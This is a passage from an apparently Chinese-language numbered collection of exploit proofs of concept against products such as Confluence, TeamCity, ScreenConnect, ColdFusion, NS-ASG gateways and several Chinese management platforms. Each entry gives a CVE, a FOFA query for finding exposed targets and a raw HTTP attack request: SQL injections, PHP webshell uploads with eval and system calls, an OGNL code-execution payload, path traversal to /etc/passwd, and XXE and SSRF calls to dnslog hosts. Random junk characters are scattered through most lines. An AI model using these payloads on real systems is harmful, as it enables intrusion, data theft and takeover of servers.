L- h+ D: i! h7 [0 vSec-Fetch-Site: same-origin, {# d3 n; E" E1 h* ]
X-Forwarded-For: 1.1.1.1
d: w0 \- q1 MX-Originating-Ip: 1.1.1.1
- }$ y6 G9 j$ C% j7 R( i, |3 K% J8 EX-Remote-Ip: 1.1.1.1$ s* Y2 Y: R" u% i6 p9 v3 z6 G$ C
X-Remote-Addr: 1.1.1.1
/ l6 U$ u+ \& XTe: trailers
, f/ c) x8 k& S- A/ B$ {Connection: close+ H% Y# t: Y+ { o, ]
& n, s0 N1 T/ s6 w
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
; u0 P! ?5 O/ }' g) ?" L
( J9 z, Y# v! B* V* [& i6 ~
" d/ x5 v5 Q# f, ^! M120. 北京百绰智能S40管理平台导入web.php任意文件上传 B. X8 o9 v4 M
CVE-2024-1253" K m% ?* k8 u {4 a% m
FOFA:title="Smart管理平台": c Y0 V" v2 Y) N! j) x3 O8 |& j
POST /useratte/web.php? HTTP/1.15 L. ~6 O/ n' _3 `
Host: ip:port" p% ~1 C( w. j$ s& Y& l
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
; s) e0 E( I' F* @* cUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: D; `+ ]: K1 I4 i( wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 x/ ^/ X( p+ z. k8 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ c' O% C. V' b8 s8 uAccept-Encoding: gzip, deflate
% _6 T% L* a" e& _& fContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
* Y+ M, i5 w5 AContent-Length: 597
7 G6 G: A) y3 _; K2 @# I# R9 m# ]- UOrigin: https://ip:port
5 T) y5 P( X7 Q& E; i8 z. F4 LReferer: https://ip:port/sysmanage/licence.php8 x. h% Q# f# g/ `! |0 X
Upgrade-Insecure-Requests: 1/ x3 p+ }0 A: f7 A* s Z; e" A
Sec-Fetch-Dest: document
. {1 I' _# x4 D+ C" c# @! U- CSec-Fetch-Mode: navigate
( X {9 i* a, K& t j, E- F3 q9 H( TSec-Fetch-Site: same-origin! x V4 t9 M4 B
Sec-Fetch-User: ?1
- |( p6 J0 S+ x Z$ O1 e' XTe: trailers
, a& `1 Z2 k$ u' b( XConnection: close
# d" n; C2 y) {
$ Y+ q" f6 Y6 F% Q h% i/ P-----------------------------42328904123665875270630079328
6 ]. G) w+ L- e- G( c3 n7 R: CContent-Disposition: form-data; name="file_upload"; filename="2.php"# M8 A; u _8 y: J/ }# F) Z
Content-Type: application/octet-stream
: F. D6 x- j! J0 r) n+ P
2 k% f( l. [- I( D<?php phpinfo()?>
% @6 {( \1 H+ P* u$ k-----------------------------423289041236658752706300793282 ~, h+ F. c, J
Content-Disposition: form-data; name="id_type"' Z1 M$ A: Y$ \3 L) Q
* y1 ]) Y9 Q8 g, i; e10 v, }( ~# W5 c0 h, u, C
-----------------------------423289041236658752706300793282 C! R5 W* u5 y
Content-Disposition: form-data; name="1_ck"6 o$ r$ k! @* { N% v' w4 O3 r! h
V" o- s( Q( x
1_radhttp
( `, p8 S$ T+ G' f: [4 ]-----------------------------42328904123665875270630079328* h3 K+ D* M6 }; L# x1 z
Content-Disposition: form-data; name="mode"4 l2 J. W3 J Y+ A
g7 \5 N1 E, R; V5 n8 G8 \4 ]- R: iimport
: c- k# Z4 u/ Z-----------------------------42328904123665875270630079328" P) Z) T2 v+ Y- [
- w' C" v8 k2 e) q
9 w6 V% T2 c* `8 h% b) A
文件路径/upload/2.php- s& t" t: w& {- U
; A" p# V' C o0 B! o3 i
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
$ ^/ K/ I2 h! R. hCVE-2024-1918' e& W3 U- S7 F6 f/ L
FOFA:title="Smart管理平台"! L' Z1 l0 u) {
POST /useratte/userattestation.php HTTP/1.1
3 ?; n6 L* D+ F* F6 K' ?2 rHost: 192.168.40.130:8443
9 N: q: R" n" T- y8 |3 _Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
+ e7 ?& c; ~3 ?. M' V! q. VUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
/ |9 w: p5 I; DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: ~ n0 O* K; k. }6 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ r( t+ D2 v- ?' L' u
Accept-Encoding: gzip, deflate
3 Z; O1 x1 e, [: J8 a5 nContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' I9 F4 Z: P6 a1 X! qContent-Length: 5921 u R1 o1 {, [/ Y
Origin: https://192.168.40.130:8443, v0 y6 v( e. h. s) l* T
Upgrade-Insecure-Requests: 1
& @2 i9 m0 L, VSec-Fetch-Dest: document
2 b3 \1 c; f' ~# kSec-Fetch-Mode: navigate
( S5 T" c" t$ B [Sec-Fetch-Site: same-origin
: R" h2 Q$ q# J$ ^1 w2 wSec-Fetch-User: ?1
9 r9 S$ r9 q3 P+ N% n2 JTe: trailers
3 p) l: z- K5 Z9 z9 U' ?0 CConnection: close% d( n9 C; X' B0 n2 } w
0 o! m p( V' ?- S, ^; }
-----------------------------423289041236658752706300793280 L% V. V2 k5 ]- \/ H% i
Content-Disposition: form-data; name="web_img"; filename="1.php"& K% \' ]9 @$ b) n
Content-Type: application/octet-stream' F8 F* I: }* j. |' G+ D
- ^9 c3 K: I0 w* b6 J0 F
<?php phpinfo();?>
9 M4 A" @. i4 I* c- X4 C9 T0 g-----------------------------42328904123665875270630079328
9 y7 x% z W+ M$ @, eContent-Disposition: form-data; name="id_type"7 M6 \0 C9 e R2 Z
: p5 f# e. J" i( `+ q R1
8 K& b2 e4 O, ~2 b-----------------------------42328904123665875270630079328
8 n" _' M7 o P( ], d# _Content-Disposition: form-data; name="1_ck"
/ J8 V" `: ~7 g% J. K7 r1 L) `& C+ g4 C6 E7 p$ l$ R5 q8 F' T
1_radhttp2 } i- E$ u$ T2 t+ O
-----------------------------423289041236658752706300793280 N3 U. W7 Y& H& O8 Q
Content-Disposition: form-data; name="hidwel"
2 w$ t w7 q1 T5 R \
1 Z8 e5 l% I# \) \set
8 @9 B3 T' a; e0 `; m; x-----------------------------42328904123665875270630079328' j( w2 D2 g: H* H- G# i
/ [4 h5 F% h" K% E$ t+ ]
% v" ]6 @ j4 I9 V8 v1 N* O# ^boot/web/upload/weblogo/1.php
5 E& P( P" {9 ` D
' k* U: ?. X5 g# ]7 ?122. 北京百绰智能s200管理平台/importexport.php sql注入
5 O3 @: i- J( K) t* H* w# y2 aCVE-2024-27718FOFA:title="Smart管理平台"
, R- h' @; f% }* T M* W$ L0 z其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
: H8 v/ ~$ {8 [GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1: s( y4 W: ? h1 p
Host: x.x.x.x
. F6 \) ^+ `9 a" ~. |4 z- ~1 JCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
3 V8 l6 v9 }- b) HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 ^+ E2 b. G, uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 x) ^' H6 c ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) h# W* ]& b4 S: K4 D$ O$ A7 t1 ]5 nAccept-Encoding: gzip, deflate, br
& h. m& K! q) p$ Z: E3 H! nUpgrade-Insecure-Requests: 1
5 G9 l8 n% t5 a; lSec-Fetch-Dest: document
( L( }6 n) H# z7 P+ _: jSec-Fetch-Mode: navigate
) w6 S% F) L! ?) GSec-Fetch-Site: none4 m+ O) ?, H X7 R G, |7 A2 i( E
Sec-Fetch-User: ?1. u/ T6 k4 _. ~( T7 o
Te: trailers" I' c9 }) c- w* H: P1 _0 g
Connection: close
0 q; ?2 e* y1 ?- [
8 o, P: C/ u! H/ X- R% u4 n+ z
; M! e# D" t9 x* u% y; D+ S123. Atlassian Confluence 模板注入代码执行
4 @- l3 G6 }! v( B# l# JFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
/ y- M4 g7 j" L5 k0 z4 U5 N6 wPOST /template/aui/text-inline.vm HTTP/1.1
; V" W$ y4 Y! H4 s7 l' S4 ]: I$ KHost: localhost:8090
& X# A# b& x- T1 ~9 R4 K9 p( ^ dAccept-Encoding: gzip, deflate, br
/ K2 w/ |0 ^, d0 m1 {1 OAccept: */*
% p O1 N5 ]0 ]3 v4 \! d) o; ~3 pAccept-Language: en-US;q=0.9,en;q=0.8' Z( d$ T9 Y) F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
. _$ e& ~! @4 X4 sConnection: close+ h m% o( R( e% Y6 m
Content-Type: application/x-www-form-urlencoded+ }3 b6 m _6 A) o
' s: ]( d! E. e" R# M
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))3 u& ]2 `, J6 T( Q' g3 Z
: J" A4 z: V, E/ [& G, ^% Q' k y. }5 V& ]1 X
124. 湖南建研工程质量检测系统任意文件上传! U. R- W! N( W- @' K
FOFA:body="/Content/Theme/Standard/webSite/login.css"$ B% L; a' _; h
POST /Scripts/admintool?type=updatefile HTTP/1.1- j' w0 C4 W2 Y
Host: 192.168.40.130:8282
7 A8 G$ P6 m, Z- Z* G' }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 J, x+ r8 e& Q! z; r" \9 @/ y
Content-Length: 72
9 }4 T* Q# c4 _6 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- J' P4 f8 \/ s* GAccept-Encoding: gzip, deflate, br/ c( a8 q ^6 ?) y, k" @' S4 Y/ s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 g) M! K/ t L: _" AConnection: close% e6 }5 F1 {% d4 w, t
Content-Type: application/x-www-form-urlencoded( _) M$ v8 k* V3 T# a, c
4 H& [; F- m$ b* i$ a4 xfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>- R* l' j( ^4 f6 u- d) F0 S! A
8 h- l2 [5 u9 t3 |# W( V: y) ]
8 M! c0 M- i0 u4 _! j& s4 B6 a( Nhttp://192.168.40.130:8282/Scripts/abcgcg.aspx- t: r( r, `- D i. I' d
# B t& a Z/ I2 K125. ConnectWise ScreenConnect身份验证绕过
( R0 P; E2 r+ s, QCVE-2024-1709
4 M8 f. z9 Y5 u" `. s7 wFOFA:icon_hash="-82958153"
' T) ^9 s# {, o0 U! h# _https://github.com/watchtowrlabs ... bypass-add-user-poc
- Y0 w( e R8 _
6 \6 O& ?+ A/ |1 x0 X; D2 q% \
7 s) i9 j/ H* \6 H使用方法
1 y% W' A' l4 Cpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!. b+ a; q8 }* s/ u
! c% I# R% N0 y& T* b
) m a* l. \' `1 d创建好用户后直接登录后台,可以执行系统命令。/ `, I8 }; U9 k+ r# D8 R% S; t" x! e6 S
" a9 ?! S5 s. ^7 z7 l3 ~126. Aiohttp 路径遍历2 A% k# g- U5 c+ X
FOFA:title=="ComfyUI"5 O0 H7 E, l6 t0 h' e+ z" a! t
GET /static/../../../../../etc/passwd HTTP/1.1
& H1 O1 e& r. w4 v% X8 ^Host: x.x.x.x
; R7 ~. B w# c) XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, V+ }7 c8 j! N
Connection: close" O! T" D2 }: [! L4 x# X" b
Accept: */*
' z1 D/ q: y8 Y' \5 mAccept-Language: en/ S& O" t$ L0 w4 C0 G5 ?+ C
Accept-Encoding: gzip3 J. q; o) y! j' ]! ]" a
6 V7 V ?/ J9 v' x9 _* g7 J" u, H8 W# l, F& k2 H
127. 广联达Linkworks DataExchange.ashx XXE/ `* x$ u' j7 o) i3 V
FOFA:body="Services/Identification/login.ashx" ( G, z, F6 \ D5 g% K$ R
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
0 v9 s: H* A1 W4 \+ gHost: 192.168.40.130:8888
, @, {& `/ W- o4 j" oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.365 s# h2 C" b7 r% B% y/ ~! W8 Q
Content-Length: 415
( }, _! g K1 S) kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# D* {' L# E* s' O, `/ Y; j2 F; z
Accept-Encoding: gzip, deflate+ h3 N$ h3 I3 v# q0 r) o$ [
Accept-Language: zh-CN,zh;q=0.9" ~9 X6 ^' P5 ?/ |
Connection: close- V$ _3 L% f" o, P/ ]
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0; y( M2 T2 N9 `/ x
Purpose: prefetch
! a) ?) _4 r$ `, h8 O0 rSec-Purpose: prefetch;prerender$ I: A" o& E% c
2 m+ k. u2 O( Z: }------WebKitFormBoundaryJGgV5l5ta05yAIe0
; U. {/ F$ P- GContent-Disposition: form-data;name="SystemName"2 y) B4 N1 U0 q; m# M3 }# W) X
3 d$ M7 a5 X/ |3 {7 `1 E" f
BIM8 W" E( r( B2 E& ?9 r: h5 }
------WebKitFormBoundaryJGgV5l5ta05yAIe0
- b( t" O/ V* ?; X0 rContent-Disposition: form-data;name="Params"! G( j1 w% m O0 U O2 ]6 F
Content-Type: text/plain
% o" K9 o8 }6 }- f8 y3 W S4 e/ s% A) ^$ h& N% U
<?xml version="1.0" encoding="UTF-8"?>
0 S+ E; B3 D: \/ j6 v& M3 h) h<!DOCTYPE test [: H2 D' f+ V' |/ l. H4 ] }
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
& O* ^7 ?9 i, _' \]7 u7 |6 u) ^" w7 ^# w' `; m/ a
>: Q" ^6 d3 @( w: d
<test>&t;</test>+ u* x( G& a; g" i9 F
------WebKitFormBoundaryJGgV5l5ta05yAIe0--( f0 z# [3 Z. L( d. R5 l3 O
% v# V7 Z; c1 Z+ j
4 p8 Q8 K7 g" t. v5 ]7 \' \7 \/ H# b5 b- Y, b4 @
128. Adobe ColdFusion 反序列化3 `7 E8 q4 l. ?9 D) G
CVE-2023-38203
5 f$ N ^: m" _Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
# i& G) H9 }2 L9 z9 GFOFA:app="Adobe-ColdFusion"
/ a$ [1 Y9 q. I- |% KPAYLOAD4 Z& X- e8 I9 o5 S6 M) l, _
, i6 H3 E. v) P0 J- `) p3 q129. Adobe ColdFusion 任意文件读取& t' k# T. Y: x+ [4 N5 V% G- d
CVE-2024-20767
% g3 B- g8 l( W; ?FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"% I+ U$ h! m/ g, q, v7 |
第一步,获取uuid
) G, H6 W. h/ y$ E6 X; |GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
" {. K# u% h2 a' C+ {5 y$ ^8 kHost: x.x.x.x+ d1 ?0 O6 `" Q8 m2 k% s- O; w* V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 e' p/ u3 t4 w
Accept: */*% [/ A5 b5 Y+ a, `' y- d
Accept-Encoding: gzip, deflate
" v! p# r( H$ G3 vConnection: close+ L+ i" V) }5 u( [) d* T
0 ]6 q& Q' }" l' Z/ p$ _) u2 S: p7 @* ^) ^/ L: V& V% F r
第二步,读取/etc/passwd文件7 Z$ M5 R. Q" ~3 z( e$ W
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1+ N* M _+ }( @. V
Host: x.x.x.x" N- o7 y- H% r- j2 t/ m& @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 a& [# V6 F% r8 [7 VAccept: */*
0 \2 E; m( s( e4 A. ~Accept-Encoding: gzip, deflate" X- \ D. V4 d6 E9 n" G$ V
Connection: close
% _0 l2 O3 u: g4 Tuuid: 85f60018-a654-4410-a783-f81cbd5000b9
, |: D" N: j5 W3 P6 m& A# O; r
3 w+ c( O- E7 `, F
& M7 ]2 c7 ^5 P+ B130. Laykefu客服系统任意文件上传+ [: T) e7 o7 i" D8 w& Z
FOFA:icon_hash="-334624619"
7 ]' B, f, f" j9 j# I2 E* S' WPOST /admin/users/upavatar.html HTTP/1.1
" F5 t' w9 @9 B) y0 I k" DHost: 127.0.0.1+ Q6 n. r- q C. \& v- A% h- y. }
Accept: application/json, text/javascript, */*; q=0.01
/ X1 S% G, s: t1 t, OX-Requested-With: XMLHttpRequest" S' ]8 N1 p: G
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26! D+ ~4 P' y6 T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR \4 r$ i) R& }, e1 K
Accept-Encoding: gzip, deflate8 A6 |, ^; D0 _. d
Accept-Language: zh-CN,zh;q=0.9
( w# J7 k( X+ [* N, ~" _- _Cookie: user_name=1; user_id=3
+ s7 V+ G( `; p% yConnection: close
1 Z; z% J! g" E r7 s0 S6 z# i6 k$ m6 U2 p
------WebKitFormBoundary3OCVBiwBVsNuB2kR
3 O* ]9 t3 A R- L7 |Content-Disposition: form-data; name="file"; filename="1.php"2 }: Q" I; ~8 M
Content-Type: image/png
+ J6 V" u# W3 O' F0 f8 v
2 g. ~& y' z8 P- J0 S' K<?php phpinfo();@eval($_POST['sec']);?>
7 P1 O5 P. |" I8 V0 D& D9 v5 |------WebKitFormBoundary3OCVBiwBVsNuB2kR--0 E* r6 v' {! Q; h
8 O! O& U5 R- c% [5 n9 r0 C
{* e% H4 u( r, F/ v2 u131. Mini-Tmall <=20231017 SQL注入! R" ?! e. R5 s5 G k8 `
FOFA:icon_hash="-2087517259") |6 M1 d. B8 {
后台地址:http://localhost:8080/tmall/admin
2 V$ A! }7 {' Shttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)9 j* b% t Y( P4 u i5 x; }! Y2 {8 F
. V, m2 e8 v( N. m6 y, H' S# ~+ ?; W, h132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过# Z4 ?4 ]& y; Q3 B4 [( y
CVE-2024-27198; T0 R. l0 a/ w' S1 C
FOFA:body="Log in to TeamCity"
s" ~! {/ J: YPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
8 g% k6 K5 p) jHost: 192.168.40.130:8111
" M" B2 [. i2 d' _0 r" sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: S; C2 R7 @5 C" \1 Z2 t
Accept: */*
* l# r* A! M' X0 ~3 h% B" RContent-Type: application/json1 ~' G0 v) B5 i+ x7 q1 {' W/ C9 q$ B
Accept-Encoding: gzip, deflate; _4 u' ?. _8 c0 i
0 w1 E, g }0 ?- J7 L1 I
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}& V, V5 A) }/ q* S# c. h
! V4 s$ ~0 |2 J0 E+ F+ d$ @
6 H& N- V+ X. w% FCVE-2024-271997 ?: e& K: g5 V \& u4 J5 {9 q/ t
/res/../admin/diagnostic.jsp
0 f5 |+ r2 o2 w. E N8 j/.well-known/acme-challenge/../../admin/diagnostic.jsp
1 j+ m6 g; o2 ?8 |) }/update/../admin/diagnostic.jsp
9 v4 k- `0 r4 b- F. T; o' S' T6 r, x# R2 i& v
: O5 k+ n9 v8 \CVE-2024-27198-RCE.py
$ k& T) `0 a V( z o D' e$ [
7 @! Q6 |9 j& _8 k" u, ?* a5 e) ?133. H5 云商城 file.php 文件上传
( @5 o0 c; r: nFOFA:body="/public/qbsp.php"
4 D, a' i W. L5 F1 ^* l1 {POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
9 n0 C* Q9 c3 mHost: your-ip
4 W; y: }7 x( c6 U, xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 W! }$ |" P4 gContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
, h7 @/ C8 y9 h( `
& K" x) o$ L' y) Q$ T" w------WebKitFormBoundaryFQqYtrIWb8iBxUCx
, p4 D7 ` y) w7 U7 cContent-Disposition: form-data; name="file"; filename="rce.php"3 J0 D# \ i X7 m5 o$ y
Content-Type: application/octet-stream+ q, _# a3 X/ K2 Q" {5 @. s0 V' \
; H' t3 i+ `8 G. z! |, [2 x( Q8 a0 L
<?php system("cat /etc/passwd");unlink(__FILE__);?>: }6 g* j. S' q7 ^, {1 b
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
. [$ o# k* s! h3 K" {/ K8 a( |3 V+ x$ B& {! r. K' v( t) R. z' J
# s5 M- @4 ]. _& e% Q5 b% V# f" z6 j
134. 网康NS-ASG应用安全网关index.php sql注入
$ q' L9 ~; G, P% TCVE-2024-2330' U; U a2 Y. \5 u
Netentsec NS-ASG Application Security Gateway 6.3版本* G5 Q j1 H& M% `# e9 p8 G
FOFA:app="网康科技-NS-ASG安全网关"
9 z1 @' r2 l+ F3 J) ]! a) u, G/ `5 }POST /protocol/index.php HTTP/1.1
n; B6 \/ D2 V$ ^$ Z- s, `0 c9 IHost: x.x.x.x
) K4 Y" m5 C$ S& j7 E3 Z7 HCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de& D; M5 R2 C2 {8 {( B9 e+ r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; o4 ~- N4 z: s/ d4 f; }4 W) gAccept: */* Y' x0 Z0 {% x# |# ^9 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 y/ h. Y3 K4 r. ~! BAccept-Encoding: gzip, deflate2 I; ]" F) `# P3 M! i: e. I5 a
Sec-Fetch-Dest: empty
5 h# K: }- m9 V; u/ XSec-Fetch-Mode: cors* C# K5 |: L9 N
Sec-Fetch-Site: same-origin
]( k$ W0 r$ N, {4 k0 NTe: trailers. X* x& }8 W2 k5 h' d
Connection: close1 Q# B3 W" w c' r& p
Content-Type: application/x-www-form-urlencoded
S% S9 c# a* b1 e. G& q( A; KContent-Length: 263
, L0 H3 f$ m Z4 `) m- a/ S$ [' e" y9 _4 e3 Y/ x
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}* X( I2 j C9 H; ?$ u9 ^6 |' {
& N' [+ ~! K$ N" O
D2 l2 D% V0 J+ Q# `135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
3 r# v p0 A5 P1 e3 XCVE-2024-2022
6 q: m4 x7 {, P- z6 Q- c+ Z2 rNetentsec NS-ASG Application Security Gateway 6.3版本 w) q9 m) v6 I9 M
FOFA:app="网康科技-NS-ASG安全网关"/ n, [* [0 x* a! y# o8 q
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
d6 O$ e* }: E/ U$ m; u. aHost: x.x.x.x
4 b' O7 X$ k9 E3 R' X$ t8 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. |1 e h. H) G, K1 O4 S/ |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# K) s; ~; {8 N' s: z( s7 @1 cAccept-Encoding: gzip, deflate
5 b" D' T1 J! s. L: ~Accept-Language: zh-CN,zh;q=0.9
1 p3 s1 Z1 b/ K2 s$ EConnection: close
! M6 D- h( K5 S* R. [+ S Y) M2 k: |* G& X$ |; k3 b
! F( t& c$ f. Z% o2 o; f2 d
136. NextChat cors SSRF
6 e7 O# h7 E( F( k. z5 M5 g' JCVE-2023-49785; D. T/ r8 H' |+ d E
FOFA:title="NextChat"
2 u* g9 k( u- @! J+ \; K) [GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
% p: H& R* L# M+ f r2 S9 [Host: x.x.x.x:10000% W1 b4 s" Q* @$ a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ i# x8 @( b$ E/ m
Connection: close( y! E9 [7 _0 G
Accept: */*
" |1 k1 I: F2 @: D2 p- zAccept-Language: en% S; Y( @: ~* J! q' m% E7 K# ~
Accept-Encoding: gzip$ x3 A) ~: { G0 K1 g" j8 D1 u
; e% E9 n" A4 i1 V2 w# B
& Q$ a6 S5 P* P9 F Z& c
137. 福建科立迅通信指挥调度平台down_file.php sql注入/ |, q: G2 V8 k1 R% i+ ^
CVE-2024-2620
0 L/ f+ {8 M) c, z; c( F9 YFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ m$ y4 R. ^- E! l
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
6 i" I$ I8 P8 w Y4 { UHost: x.x.x.x5 o7 a# D; ~4 n! \) x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 p" |( g1 D! h' F# @$ L |0 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 U2 x- [3 i$ {6 O5 x: OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; C2 A& ~( S7 U
Accept-Encoding: gzip, deflate, br9 v; b: | K% v
Connection: close
+ h; e) B! b0 ]9 x G& uCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
3 K* I! _% B9 b N# ]; ~Upgrade-Insecure-Requests: 1
, w, n1 o4 ~, I' H. T1 a2 y8 g. J$ Q) ]$ ~( s w6 M$ w }
# D) k% M: l) @+ W( w( D
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' j6 j8 C( Q) c) u7 d, I( F3 n" SCVE-2024-2621
8 Z8 i/ f0 J' l6 lFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"# S$ z% O5 U3 \+ O$ ]' S
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
, R+ r1 `9 s4 D. C2 X3 x4 HHost: x.x.x.x$ ?7 A% \0 x Z/ a o# t8 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* l1 E! ]0 H* E6 i) _9 v7 ^9 A8 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ o0 d5 h8 I/ ?- J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* P' h6 C; }+ c8 p+ X# A7 I
Accept-Encoding: gzip, deflate, br4 h% |! X/ C1 c: V
Connection: close; y B* ]/ F2 L! C
Upgrade-Insecure-Requests: 11 F" c0 Q" o: Z
& |% o9 ]+ n9 u: Z3 T/ {
( l; z, I: @/ a& U& h/ U5 ?
139. 福建科立讯通信指挥调度平台editemedia.php sql注入( L# |- I! Z6 K9 h
